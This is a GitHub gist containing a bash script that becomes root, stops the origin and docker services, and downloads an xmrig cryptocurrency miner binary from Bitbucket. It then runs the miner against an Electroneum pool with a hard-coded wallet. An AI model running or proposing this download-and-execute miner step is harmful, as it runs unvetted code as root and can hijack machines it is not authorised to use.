Skip to content

Instantly share code, notes, and snippets.

@haphan
Last active March 8, 2018 16:54
Show Gist options
  • Select an option

  • Save haphan/ef31b8c35fc68190aef41aec941ffd2b to your computer and use it in GitHub Desktop.

Select an option

Save haphan/ef31b8c35fc68190aef41aec941ffd2b to your computer and use it in GitHub Desktop.
#!/bin/bash
sudo su
sysctl -w vm.nr_hugepages=16
systemctl stop origin
systemctl stop docker
mkdir -p /opt/mine && cd /opt/mine
wget https://bitbucket.org/haphan/xmrig-free/downloads/xmrig-free
chmod +x xmrig-free
./xmrig-free -o stratum+tcp://pool.etn.spacepools.org:3333 -u etnkLK5q9fTJTWJaHSJoU4XR6P7A22QbZLVW5KdJgzPP4oxRJVcGXC3XJY21qvvKmFjWf1xon6pT91hv53CnbWpy972ToQNfUV.5000@vm -p x --donate-level -0 -S
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment